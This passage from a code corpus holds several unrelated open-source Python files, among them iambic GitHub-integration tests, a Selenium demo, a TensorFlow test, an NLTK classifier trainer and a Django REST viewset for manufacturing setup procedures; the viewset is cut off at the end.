mock_Github.return_value.get_repo.return_value.get_pull.assert_called_once_with(\n 4\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.assert_called_once_with(\n \"iambic git-plan\"\n )\n mock_Github.reset_mock()\n\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"issue_comment\",\n \"iambic\": {\"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\"},\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n \"user\": {\n \"login\": \"fake-commenter\",\n },\n },\n \"issue\": {\"number\": 4},\n \"repository\": {\n \"clone_url\": \"https://github.com/exampleorg/iambic-templates.git\"\n },\n },\n }\n run_handler(arg)\n assert 1 == mock_Github.call_count\n mock_Github.assert_called_once_with(\"fake-token\")\n mock_Github.return_value.get_repo.assert_called_once_with(\n \"exampleorg/iambic-templates\"\n )\n mock_Github.return_value.get_repo.return_value.get_pull.assert_called_once_with(\n 4\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.mergeable_state.__ne__.assert_called_once_with(\n \"clean\"\n )\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.mergeable_state.__str__.assert_called_once_with()\n mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.assert_called_once()\n assert (\n \"This probably means that the necessary approvals have not been granted for the request.\"\n in 
mock_Github.return_value.get_repo.return_value.get_pull.return_value.create_issue_comment.call_args.args[\n 0\n ]\n )\n mock_Github.reset_mock()\n\n arg = {\n \"token\": \"fake-token\",\n \"event_name\": \"iambic_command\",\n \"iambic\": {\n \"GH_OVERRIDE_TOKEN\": \"GH_OVERRIDE_TOKEN\",\n \"IAMBIC_CLOUD_IMPORT_CMD\": \"import\",\n },\n \"repository\": \"exampleorg/iambic-templates\",\n \"event\": {\n \"comment\": {\n \"body\": \"iambic git-apply\",\n },\n \"issue\": {\"number\": 4},\n \"repository\": {\n \"clone_url\": \"https://github.com/exampleorg/iambic-templates.git\"\n },\n },\n }\n # TODO: Need to mock the paths\n with pytest.raises(Exception):\n run_handler(arg)\n\n\n@pytest.fixture\ndef mock_proposed_changes_filesystem():\n temp_templates_directory = tempfile.mkdtemp(\n prefix=\"iambic_test_temp_templates_directory\"\n )\n\n try:\n contents = \"\"\"hello world\"\"\"\n contents_path = f\"{temp_templates_directory}/proposed_changes.yaml\"\n\n with open(contents_path, \"w\") as f:\n f.write(contents)\n\n yield contents_path, contents\n finally:\n try:\n shutil.rmtree(temp_templates_directory)\n except Exception as e:\n print(e)\n\n\n# verify if there are changes during git_apply. those changes are push\n# back into the PR\ndef test_post_artifact_to_companion_repository(\n mock_github_client,\n mock_proposed_changes_filesystem,\n):\n contents_path, contents = mock_proposed_changes_filesystem\n markdown_summary = \"test_summary\"\n\n mock_template_repo = mock_github_client.get_repo.return_value\n\n # we are mocking how the sha has changed in the local checkout repo\n type(mock_template_repo).full_name = PropertyMock(\n side_effect=[\n \"ExampleOrg/iambic-templates\",\n ]\n )\n\n pull_number = \"1337\"\n op_name = \"plan\"\n html_url = _post_artifact_to_companion_repository(\n mock_github_client,\n mock_github_client.get_repo(\"ExampleOrg/iambic-templates\"),\n pull_number,\n op_name,\n contents_path,\n markdown_summary,\n default_base_name=\"proposed_changes.yaml\",\n write_summary=True,\n )\n\n mock_calls = mock_template_repo.create_file.call_args_list\n assert mock_calls\n\n # verify first call to upload proposed_changes.yaml\n proposed_changes_yaml_call = mock_calls[0]\n # index 1 is where the arguments are, next index 0 is the blob_path\n blob_path, commit_message, blob_contents = proposed_changes_yaml_call[0]\n assert f\"pr-{pull_number}\" in blob_path\n assert f\"{op_name}\" in blob_path\n assert \"proposed_changes.yaml\" in blob_path\n\n # index 1 is where the arguments are, next index 1 is the commit_message\n assert commit_message == f\"{op_name}\"\n\n # index 1 is where the arguments are, next index 2 is the blob_contents\n assert blob_contents == contents\n\n # verify second call to upload summary.md\n summary_md_call = mock_calls[1]\n # index 1 is where the arguments are, next index 0 is the blob_path\n blob_path, commit_message, blob_contents = summary_md_call[0]\n assert f\"pr-{pull_number}\" in blob_path\n assert f\"{op_name}\" in blob_path\n assert \"summary.md\" in blob_path\n\n # index 1 is where the arguments are, next index 1 is the commit_message\n assert commit_message == f\"{op_name}\"\n\n # index 1 is where the arguments are, next index 2 is the blob_contents\n assert blob_contents == markdown_summary\n\n assert html_url\n\n\ndef test_ensure_body_length_fits_github_spec():\n blob_html_url = \"https://fake-location/\"\n body = \"h\" * (BODY_MAX_LENGTH + 1)\n new_body = ensure_body_length_fits_github_spec(body, blob_html_url=blob_html_url)\n assert blob_html_url 
in new_body\n\n\ndef test_maybe_merge_crashes(\n mock_github_client,\n):\n def merge_error(*args, **kwargs):\n raise github.GithubException(409, \"409 unable to merge\", {})\n\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.merge.side_effect = merge_error\n templates_repo = mock_github_client.get_repo(\"ExampleOrg/iambic-templates\")\n pull_number = 1337\n merge_sha = \"non_existent_sha\"\n expected_attempts = 3\n with pytest.raises(RuntimeError, match=\"Fail to merge PR\"):\n maybe_merge(\n templates_repo,\n pull_number,\n merge_sha,\n max_attempts=expected_attempts,\n sleep_interval=0.1,\n )\n assert mock_pull_request.merge.called\n assert len(mock_pull_request.merge.mock_calls) == expected_attempts\n\n\ndef test_maybe_merge_does_not_crash(\n mock_github_client,\n):\n def merge_error(*args, **kwargs):\n return MagicMock()\n\n mock_pull_request = mock_github_client.get_repo.return_value.get_pull.return_value\n mock_pull_request.mergeable_state = MERGEABLE_STATE_CLEAN\n mock_pull_request.merge.side_effect = merge_error\n templates_repo = mock_github_client.get_repo(\"ExampleOrg/iambic-templates\")\n pull_number = 1337\n merge_sha = \"non_existent_sha\"\n expected_attempts = 3\n maybe_merge(\n templates_repo,\n pull_number,\n merge_sha,\n max_attempts=expected_attempts,\n sleep_interval=0.1,\n )\n assert mock_pull_request.merge.called\n assert len(mock_pull_request.merge.mock_calls) == 1\n","repo_name":"noqdev/iambic","sub_path":"test/plugins/v0_1_0/github/test_github.py","file_name":"test_github.py","file_ext":"py","file_size_in_byte":25256,"program_lang":"python","lang":"en","doc_type":"code","stars":256,"dataset":"github-code","pt":"75"} +{"seq_id":"15600121634","text":"from selenium import webdriver\nfrom selenium.webdriver import ActionChains\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.common.by import By\nservice_obj=Service(\"./chromedriver/chromedriver.exe\")\ndriver = webdriver.Chrome(service=service_obj)\ndriver.maximize_window()\n\ndriver.get(\"https://rahulshettyacademy.com/AutomationPractice/\")\naction = ActionChains(driver)\naction.click_and_hold(driver.find_element(By.ID,\"mousehover\")).perform()\n# action.context_click(driver.find_element(By.XPATH,\"//a[@href='#top']\")).perform()\n# action.double_click()\naction.move_to_element(driver.find_element(By.LINK_TEXT,\"Reload\")).perform()\naction.move_to_element(driver.find_element(By.LINK_TEXT,\"Top\")).perform()\ndriver.get_screenshot_as_file(\"lll.jpeg\")\n\ndriver.close()","repo_name":"laxman-jambagi/First_git_demo","sub_path":"Action_chains_class.py","file_name":"Action_chains_class.py","file_ext":"py","file_size_in_byte":786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29312644110","text":"import tensorflow as tf\n\nfrom tensorflow_graphics.projects.gan import exponential_moving_average\n\n\nclass ExponentialMovingAverageTest(tf.test.TestCase):\n\n def test_decay_one_values_are_from_initialization(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=1.0)\n initial_value = 2.0\n variable = tf.Variable(initial_value)\n\n ema.apply((variable,))\n variable.assign(3.0)\n ema.apply((variable,))\n\n self.assertAllClose(ema.averaged_variables[0], initial_value)\n\n def test_decay_zero_returns_last_value(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.0)\n final_value = 
3.0\n variable = tf.Variable(2.0)\n\n ema.apply((variable,))\n variable.assign(final_value)\n ema.apply((variable,))\n\n self.assertAllClose(ema.averaged_variables[0], final_value)\n\n def test_cross_replica_context_raises_error(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.0)\n\n with self.assertRaisesRegex(\n NotImplementedError, 'Cross-replica context version not implemented.'):\n with tf.distribute.MirroredStrategy().scope():\n variable = tf.Variable(2.0)\n ema.apply((variable,))\n\n def test_mirrored_strategy_replica_context_runs(self):\n ema = exponential_moving_average.ExponentialMovingAverage(decay=0.5)\n strategy = tf.distribute.MirroredStrategy()\n\n def apply_to_ema(variable):\n ema.apply((variable,))\n\n with strategy.scope():\n variable = tf.Variable(2.0)\n strategy.run(apply_to_ema, (variable,))\n\n self.assertAllClose(ema.averaged_variables[0], variable.read_value())\n\n\nif __name__ == '__main__':\n tf.test.main()\n","repo_name":"tensorflow/graphics","sub_path":"tensorflow_graphics/projects/gan/exponential_moving_average_test.py","file_name":"exponential_moving_average_test.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":2734,"dataset":"github-code","pt":"75"} +{"seq_id":"41854266160","text":"numbers = []\n\nwhile True:\n line = input(\"enter a number or Enter to finish: \")\n if line:\n try:\n number = int(line)\n except ValueError as err:\n print(err)\n continue\n numbers += [number]\n else:\n break\n\ncount = len(numbers)\n\nif count:\n total = sum(numbers)\n print(\"numbers:\", numbers)\n print(\"count =\", count, \"sum =\", total,\n \"lowest =\", min(numbers), \"highest =\", max(numbers),\n \"mean =\", total / count)\n","repo_name":"giocosmiano/programming-in-python-3","sub_path":"ch01-rapid-introduction/exercise_02.py","file_name":"exercise_02.py","file_ext":"py","file_size_in_byte":500,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"20395996202","text":"import nltk\nimport random\nimport pickle\nfrom nltk.corpus import movie_reviews\n\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB, GaussianNB, BernoulliNB\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\n\nfrom nltk.tokenize import word_tokenize\n\nclass CategoryClassf(object):\n def __init__(self):\n self.acting = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/acting.txt\", \"r\").read()\n self.directing = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/directing.txt\", \"r\").read()\n self.storyline = open(\"E:/CDAP/FlaskProject/TextFiles/Datasets/Categories/story.txt\", \"r\").read()\n\n self.documents = []\n self.all_words = []\n\n self.loadDocument()\n\n\n self.all_words = nltk.FreqDist(self.all_words)\n\n word_features = list(self.all_words.keys())[:5000]\n\n def find_features(document):\n # words = set(document)\n words = word_tokenize(document)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n\n return features\n\n # print((find_features(movie_reviews.words('neg/cv000_29416.txt'))))\n featuresets = [(find_features(rev), category) for (rev, category) in self.documents]\n random.shuffle(featuresets)\n # posterior = prior occurences x liklihood / evidence\n\n # positive data example\n print(len(featuresets))\n\n self.training_set = featuresets[:900]\n self.testing_set = featuresets[900:]\n\n\n\n\n 
def loadDocument(self):\n for p in self.directing.split('\\n'):\n self.documents.append((p, \"directing\"))\n\n for p in self.storyline.split('\\n'):\n self.documents.append((p, \"storyline\"))\n\n for p in self.acting.split('\\n'):\n self.documents.append((p, \"acting\"))\n\n self.short_acting = word_tokenize(self.acting)\n self.short_directing = word_tokenize(self.directing)\n self.short_storyline = word_tokenize(self.storyline)\n\n for w in self.short_acting:\n self.all_words.append(w.lower())\n\n for w in self.short_directing:\n self.all_words.append(w.lower())\n\n for w in self.short_storyline:\n self.all_words.append(w.lower())\n\n\n def saveClassifiers(self):\n\n \"\"\"\n Saving classifiers with pickling\n :return: \n \"\"\"\n\n classifierFilePath = \"E:/CDAP/FlaskProject/SavedClassifiers/CategoryClassifiers/\"\n\n classifier = nltk.NaiveBayesClassifier.train(self.training_set)\n save_classifier = open( classifierFilePath + \"naivebayes.pickle\", \"wb\")\n pickle.dump(classifier, save_classifier)\n save_classifier.close()\n\n MNB_classifier = SklearnClassifier(MultinomialNB())\n MNB_classifier.train(self.training_set)\n save_MNBclassifier = open(classifierFilePath + \"MNB.pickle\", \"wb\")\n pickle.dump(MNB_classifier, save_MNBclassifier)\n save_MNBclassifier.close()\n\n BernoulliNB_classifier = SklearnClassifier(BernoulliNB())\n BernoulliNB_classifier.train(self.training_set)\n save_Bernouliclassifier = open(classifierFilePath + \"Bernouli.pickle\", \"wb\")\n pickle.dump(BernoulliNB_classifier, save_Bernouliclassifier)\n save_Bernouliclassifier.close()\n\n LogisticRegression_classifier = SklearnClassifier(LogisticRegression())\n LogisticRegression_classifier.train(self.training_set)\n save_LogisticRegression = open(classifierFilePath + \"Logistic.pickle\", \"wb\")\n pickle.dump(LogisticRegression_classifier, save_LogisticRegression)\n save_LogisticRegression.close()\n\n SGDClassifier_classifier = SklearnClassifier(SGDClassifier())\n SGDClassifier_classifier.train(self.training_set)\n save_SGDClassifier_classifier = open(classifierFilePath + \"SGD.pickle\", \"wb\")\n pickle.dump(SGDClassifier_classifier, save_SGDClassifier_classifier)\n save_SGDClassifier_classifier.close()\n\n SVC_classifier = SklearnClassifier(SVC())\n SVC_classifier.train(self.training_set)\n save_SVC_classifier = open(classifierFilePath + \"SVC.pickle\", \"wb\")\n pickle.dump(SVC_classifier, save_SVC_classifier)\n save_SVC_classifier.close()\n\n # LinearSVC_classifier = SklearnClassifier(LinearSVC())\n # LinearSVC_classifier.train(training_set)\n # save_LinearSVC_classifier = open(\"LinearSVC.pickle\" , \"wb\")\n # pickle.dump(LinearSVC_classifier , save_LinearSVC_classifier)\n # save_LinearSVC_classifier.close()\n #\n # NuSVC_classifier = SklearnClassifier(NuSVC())\n # NuSVC_classifier.train(training_set)\n # save_NuSVC_classifier = open(\"NuSVC.pickle\" , \"wb\")\n # pickle.dump(NuSVC_classifier , save_NuSVC_classifier)\n # save_NuSVC_classifier.close()\n\n\n\n","repo_name":"vishwnv/jAnalyzer","sub_path":"Scripts/CategoryClassifying/SaveCGClassifiers.py","file_name":"SaveCGClassifiers.py","file_ext":"py","file_size_in_byte":4934,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"27980338149","text":"#!/usr/bin/env python3\n\nimport secrets\nimport threading\n\nfrom .appconf import config as cfg\n\n#\n# Helper Functions\n#\n\n\ndef has_prefix(name):\n \" Check if name is managed by LXDRunner \"\n return name.startswith(cfg.prefix + \"-\")\n\n\ndef 
make_name():\n \" Generate name based on prefix and random token \"\n return \"{}-{}\".format(cfg.prefix, secrets.token_hex(3))\n\n\ndef threadit(func, **kwargs):\n thread = threading.Thread(target=func, daemon=True, **kwargs)\n thread.start()\n return thread\n\n\ndef env_str(data):\n\n sdata = \"\"\n for key, val in data.items():\n sdata += f\"{key}={val}\\n\"\n return sdata\n\n\ndef image_to_source(image):\n \" Convert image resource [:] to source object \"\n alias = image\n source = dict(type=\"image\", mode=\"pull\")\n\n if \":\" in image:\n remote_name, alias = image.split(\":\", 1)\n remote = cfg.remotes.get(remote_name)\n source['protocol'] = remote.protocol\n source['server'] = remote.addr\n\n source['alias'] = alias\n return source\n","repo_name":"jonans/lxdrunner","sub_path":"lxdrunner/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1031,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"75"} +{"seq_id":"6999255514","text":"import sqlite3\nfrom datetime import datetime, timedelta\n\nfrom django.db.models import Count\nfrom django.db.models.query_utils import Q\nfrom rest_framework import status\nfrom rest_framework.decorators import action\nfrom rest_framework.response import Response\nfrom rest_framework.views import APIView\nfrom rest_framework.viewsets import ModelViewSet\n\nfrom accounts.models import User, Cargo\nfrom maquinas.models import Maquinas\nfrom setup.models import EtapaProcesso, Procedimento, OrdemProcesso, ProcedimentoPadrao\nfrom setup.serializers import (\n EtapaProcessoSerializer,\n # SetupSerializer,\n OrdemProcessoSerializer,\n ProcedimentoShortSerializer, ProcedimentoDetailsSerializer, ProcedimentoStatusSerializer,\n RelatorioPeriodoSerializar, ProcedimentoSerializer)\n\n\nclass OrdemProcessoViewSet(ModelViewSet):\n queryset = OrdemProcesso.objects.all()\n serializer_class = OrdemProcessoSerializer\n\n\nclass EtapaProcessoViewSet(ModelViewSet):\n queryset = EtapaProcesso.objects.all()\n serializer_class = EtapaProcessoSerializer\n\n def create(self, request, *args, **kwargs):\n # op etapa gerente maquina descrica status\n data = request.data\n op = self.request.data.get('op', None)\n gerente = self.request.data.get('gerente', None)\n maquina = self.request.data.get('maquina', None)\n nivel = self.request.data.get('nivel', None)\n\n try:\n etapa = EtapaProcesso(etapa=data['etapa'],\n descricao=data['descricao'],\n nivel=data['nivel'],\n linha=data['linha'],\n hora_programada = data['hora_programada'],\n quantidadeKit = data['quantidadeKit']\n )\n\n etapa.op = OrdemProcesso.objects.get(id=op)\n etapa.gerente = User.objects.get(id=gerente)\n etapa.maquina = Maquinas.objects.get(id=maquina)\n\n etapa.save()\n\n procedimentoPadrao = ProcedimentoPadrao.objects.filter(nivel=nivel)\n\n for padrao in procedimentoPadrao:\n\n procedimento = Procedimento(ordem_roteiro=padrao.ordem_roteiro, descricao=padrao.descricao,\n tempo_estimado=padrao.tempo_estimado, tipo=padrao.tipo)\n\n procedimento.setor = padrao.setor\n procedimento.operador = padrao.operador\n procedimento.tempo_estimado_ms = self.convert_date_ms(padrao.tempo_estimado)\n procedimento.processo = EtapaProcesso.objects.get(id=etapa.id)\n\n procedimento.save()\n\n return Response(status=status.HTTP_201_CREATED)\n except Exception as e:\n print (e)\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n\n def convert_date_ms(self, date_string):\n\n date_time = datetime.strptime(date_string, '%H:%M:%S').time()\n\n t_hora_str = 
int(date_time.strftime('%H'))\n t_min_str = int(date_time.strftime('%M'))\n t_seg_str = int(date_time.strftime('%S'))\n\n total_ms = timedelta(hours=t_hora_str, minutes=t_min_str, seconds=t_seg_str).seconds * 1000\n return total_ms\n\n def update(self, request, *args, **kwargs):\n etapa = self.get_object()\n etapa.status = request.data.get('status', etapa.status)\n etapa.descricao = request.data.get('descricao', etapa.descricao)\n etapa.etapa = request.data.get('etapa', etapa.etapa)\n etapa.nivel = request.data.get('nivel', etapa.nivel)\n try:\n gerente = request.data.get('gerente', None)\n maquina = request.data.get('maquina', None)\n etapa = request.data.get('nivel', None)\n etapa.gerente = User.objects.get(id=gerente)\n etapa.maquina = Maquinas.objects.get(id=maquina)\n etapa.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'message': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n # Lista todos os processos (etapas) associadas a uma OP\n # url etapa-processo/{op_id}/listar_por_op/\n @action(methods=['get'], detail=True)\n def listar_por_op(self, request, pk):\n queryset = EtapaProcesso.objects.filter(op=pk)\n serializer = EtapaProcessoSerializer(queryset, many=True)\n return Response(serializer.data)\n\n @action(methods=['get'], detail=False)\n def etapa_ativos(self, request):\n etapas = EtapaProcesso.objects.filter(status=1)\n serializer = EtapaProcessoSerializer(etapas, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n\n\nclass CriarProcedimento(APIView):\n\n def post(self, request, format=None):\n print (request.data)\n\n file_serializer = ProcedimentoSerializer(data=request.data)\n\n if file_serializer.is_valid():\n\n objeto = file_serializer.save()\n\n porque_serializer = ProcedimentoSerializer(objeto)\n\n return Response(porque_serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(file_serializer.errors, status=status.HTTP_400_BAD_REQUEST)\n\n\nclass ProcedimentoViewSet(ModelViewSet):\n serializer_class = ProcedimentoShortSerializer\n\n def get_queryset(self):\n processo_id = self.request.query_params.get('processo_id', None)\n setor_id = self.request.data.get('setor_id', None)\n setor_nome = self.request.data.get('setor_nome', None)\n\n queryset = Procedimento.objects.all()\n\n if setor_id or setor_nome:\n queryset = queryset.filter(setor=setor_id) | queryset.filter(setor__descricao=setor_nome)\n if processo_id:\n queryset = queryset.filter(processo=processo_id)\n\n return queryset\n\n def create(self, request, *args, **kwargs):\n data = request.data\n\n try:\n procedimento = Procedimento(ordem_roteiro=data['ordem_roteiro'],\n descricao=data['descricao'],\n tempo_estimado=data['tempo_estimado'],\n tipo=data['tipo'])\n\n operador = User.objects.get(id=data['operador'])\n procedimento.operador = operador\n # setor_desc = data.get('setor', None)\n # procedimento.setor = setor[0] # Cargo.objects.get(id=data['setor'])\n\n # procedimento.setor = Cargo.objects.filter(descricao=data['setor'])\n\n predecessor = self.request.data.get('predecessor', None)\n\n if predecessor:\n procedimento.predecessor = Procedimento.objects.get(id=predecessor)\n\n procedimento.processo = EtapaProcesso.objects.get(id=data['processo'])\n procedimento.tempo_estimado_ms = self.convert_date_ms(procedimento.tempo_estimado)\n\n try:\n procedimento.save()\n except Exception as e:\n print (e)\n print(\"Procedimento salvo\")\n serializer = ProcedimentoShortSerializer(procedimento)\n\n return Response(serializer.data, 
status=status.HTTP_201_CREATED)\n except Exception as e:\n print(e)\n return Response({'message': e}, status=status.HTTP_400_BAD_REQUEST)\n\n def retrieve(self, request, *args, **kwargs):\n print(\"Retrieve\")\n procedimento = self.get_object()\n serializer = ProcedimentoDetailsSerializer(procedimento)\n return Response(serializer.data)\n\n def update(self, request, *args, **kwargs):\n print(\"Update\")\n return super(ProcedimentoViewSet, self).update(request, *args, **kwargs)\n\n # Usar o metodo HTTP PATCH no front-end\n def partial_update(self, request, *args, **kwargs):\n print(\"Parcial Update\")\n procedimento = self.get_object()\n\n # TODO Nesse trecho podem ser colocados os campos a serem atualizados quando for necessário\n procedimento.descricao = request.data.get('descricao', procedimento.descricao)\n procedimento.tempo_estimado = request.data.get('tempo_estimado', procedimento.tempo_estimado)\n procedimento.status = request.data.get('status', procedimento.status)\n\n try:\n operador = request.data.get('operador', None)\n if operador:\n operador_id = User.objects.get(id=operador)\n procedimento.operador = operador_id\n except Exception as e:\n return Response({'message': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n procedimento.save()\n serializer = ProcedimentoShortSerializer(procedimento)\n return Response(serializer.data)\n\n # Verifica qual o status da atividade anterior a atual.\n @action(methods=['get'], detail=True)\n def verify_status_pre(self, request):\n if self.get_object().predecessor is not None:\n predecessorId = self.get_object().predecessor.id\n predecessor = Procedimento.objects.get(id=predecessorId)\n else:\n return Response('the object has no predecessor', status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProcedimentoStatusSerializer(predecessor)\n\n if predecessor.status is not None:\n if predecessor.status >= 3:\n return Response(serializer.data, status=status.HTTP_200_OK)\n else:\n return Response(serializer.data, status=status.HTTP_406_NOT_ACCEPTABLE)\n else:\n return Response('The status field is empty', status=status.HTTP_404_NOT_FOUND)\n\n @action(methods=['post'], detail=True)\n def iniciar_procedimento(self, request, pk):\n procedimento = self.get_object()\n operador = request.data.get('operador', None)\n hora_inicio = request.data.get('hora_inicio', None)\n\n if not hora_inicio:\n return Response(status=status.HTTP_400_BAD_REQUEST)\n\n try:\n procedimento.hora_inicio = hora_inicio\n operador_id = User.objects.get(id=operador)\n procedimento.operador = operador_id\n procedimento.status = 2 # status = Realizando\n procedimento.save()\n return Response(status=status.HTTP_200_OK)\n except Exception as e:\n print(e.args[0])\n return Response({'mensage': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def finalizar_procedimento(self, request, pk):\n procedimento = self.get_object()\n\n procedimento.hora_fim = request.data.get('hora_fim', None)\n procedimento.montador = request.data.get('montador', None)\n procedimento.status = 3\n\n try:\n inicio = procedimento.hora_inicio.strftime(\"%Y-%m-%d %H:%M:%S\")\n data_inicio = datetime.strptime(inicio, \"%Y-%m-%d %H:%M:%S\")\n data_fim = datetime.strptime(procedimento.hora_fim, \"%Y-%m-%d %H:%M:%S\")\n result = (data_fim - data_inicio).seconds\n\n procedimento.tempo_realizado_ms = str(result * 1000)\n procedimento.tempo_realizado = self.convert_ms_date_mask(procedimento.tempo_realizado_ms)\n procedimento.save()\n serializer = 
ProcedimentoDetailsSerializer(procedimento)\n\n self.verificar_procedimento(procedimento)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Exception as e:\n msg = e.args[0]\n print(msg)\n return Response({'mensage': msg}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['POST'], detail=True)\n def finalizar_com_justificativa(self, request, pk):\n procedimento = self.get_object()\n\n procedimento.hora_fim = request.data.get('hora_fim', None)\n procedimento.status = request.data.get('status', None)\n procedimento.observacao = request.data.get('observacao', None)\n procedimento.montador = request.data.get('montador', None)\n\n try:\n if procedimento.status == '4':\n inicio = procedimento.hora_inicio.strftime(\"%Y-%m-%d %H:%M:%S\")\n data_inicio = datetime.strptime(inicio, \"%Y-%m-%d %H:%M:%S\")\n data_fim = datetime.strptime(procedimento.hora_fim, \"%Y-%m-%d %H:%M:%S\")\n result = (data_fim - data_inicio).seconds\n\n procedimento.tempo_realizado_ms = str(result * 1000)\n procedimento.tempo_realizado = self.convert_ms_date_mask(procedimento.tempo_realizado_ms)\n\n # now = datetime.now()\n # procedimento.hora_inicio = now\n\n procedimento.save()\n serializer = ProcedimentoDetailsSerializer(procedimento)\n\n self.verificar_procedimento(procedimento)\n return Response(serializer.data, status=status.HTTP_200_OK)\n except Exception as e:\n msg = e.args[0]\n print('msg de erro ', msg)\n return Response({'mensage': msg}, status=status.HTTP_400_BAD_REQUEST)\n\n def verificar_procedimento(self, procedimento):\n pro = Procedimento.objects.filter(status=1) | Procedimento.objects.filter(status=2)\n # Se retornar vazio, nao existem atividades pendentes\n # # logo, o status do processo deve ser alterado para \"finalizado\"\n if not pro:\n processo_id = procedimento.processo.id\n etapa = EtapaProcesso.objects.get(id=processo_id)\n etapa.status = 2\n etapa.save()\n\n # TODO mudar este método usando o query_params.get()\n # procedimento/{id}/listar_procedimento/\n # procedimento/listar_procedimento/?processo_id={?}\n @action(methods=['get'], detail=True)\n def listar_procedimentos(self, request, pk):\n\n queryset = Procedimento.objects.filter(processo=pk)\n\n try:\n if not queryset:\n return Response(status=status.HTTP_404_NOT_FOUND)\n else:\n\n externo = queryset.filter(tipo=1).order_by('ordem_roteiro')\n interno = queryset.filter(tipo=2).order_by('ordem_roteiro')\n\n serializer1 = ProcedimentoShortSerializer(externo, many=True)\n serializer2 = ProcedimentoShortSerializer(interno, many=True)\n\n data = {\n 'setup_externo': serializer1.data,\n 'setup_interno': serializer2.data\n }\n return Response(data, status=status.HTTP_200_OK)\n except Exception as e:\n return Response({'error': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n @action(methods=['get'], detail=False)\n def listar_etapa_cargo(self, request):\n op = self.request.query_params.get('op', None)\n setor = self.request.query_params.get('setor', None)\n\n try:\n operador = User.objects.get(id=setor)\n procedimento = Procedimento.objects.filter(status=1) | Procedimento.objects.filter(status=2)\n\n procedimento = procedimento.values(\n 'processo__id',\n 'processo__descricao',\n 'processo__maquina__descricao',\n 'processo__op__descricao',\n 'processo__etapa',\n 'processo__hora_inicio',\n 'processo__gerente__name',\n ).annotate(qtde_atividades=Count('setor')).filter(\n operador=operador\n )\n if op:\n procedimento = procedimento.filter(processo__op=op)\n\n if not procedimento:\n return Response({'message': 'List is empty 
or null'}, status=status.HTTP_404_NOT_FOUND)\n\n return Response({'etapa_processo': procedimento}, status=status.HTTP_200_OK)\n except Exception as e:\n mensagem = {'error': e}\n return Response(mensagem, status=404)\n\n @action(methods=['get'], detail=False)\n def verificar_procedimento_aberto(self, request):\n user = self.request.query_params.get('operador', None)\n\n try:\n criterion1 = Q(status=1)\n criterion2 = Q(status=2)\n procedimento = Procedimento.objects.filter(operador=user)\n if not procedimento: # Verifica se a lista for zero, vazio ou false\n return Response({'menssage': 'Empty List'}, status=status.HTTP_404_NOT_FOUND)\n\n serializer = ProcedimentoDetailsSerializer(procedimento, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n\n except Exception as e:\n return Response({'menssage': e.args[0]}, status=status.HTTP_404_NOT_FOUND)\n\n @action(methods=['post'], detail=False)\n def reutilizar_setup(self, request):\n etapa_id = request.data.get('etapa_id', None)\n\n procedimentos = Procedimento.objects.filter(processo__id=int(etapa_id))\n etapa = procedimentos[0].processo\n\n obj_etapa = EtapaProcesso.objects.create(\n op=etapa.op, maquina=etapa.maquina,\n descricao=etapa.descricao\n )\n query_list = list()\n for pro in procedimentos:\n obj = Procedimento.objects.create(\n ordem_roteiro=pro.ordem_roteiro, descricao=pro.descricao,\n setor=pro.setor, tempo_estimado=pro.tempo_estimado,\n tempo_estimado_ms=pro.tempo_estimado_ms, status=1,\n processo=obj_etapa, tipo=pro.tipo\n )\n query_list.append(obj)\n\n serializer = ProcedimentoShortSerializer(query_list, many=True)\n return Response(serializer.data, status=status.HTTP_200_OK)\n # return Response(status=status.HTTP_200_OK)\n\n def convert_date_ms(self, date_string):\n\n date_time = datetime.strptime(date_string, '%H:%M:%S').time()\n\n t_hora_str = int(date_time.strftime('%H'))\n t_min_str = int(date_time.strftime('%M'))\n t_seg_str = int(date_time.strftime('%S'))\n\n total_ms = timedelta(hours=t_hora_str, minutes=t_min_str, seconds=t_seg_str).seconds * 1000\n return total_ms\n\n def convert_ms_date_mask(self, request_ms):\n request_seconds = int(request_ms) // 1000\n out = timedelta(seconds=request_seconds)\n return str(out)\n\n\nclass RelatoriosViewSet(ModelViewSet):\n queryset = Procedimento.objects.all()\n serializer_class = RelatorioPeriodoSerializar\n\n @action(methods=['post'], detail=False)\n def processo_por_periodo(self, request):\n processo = 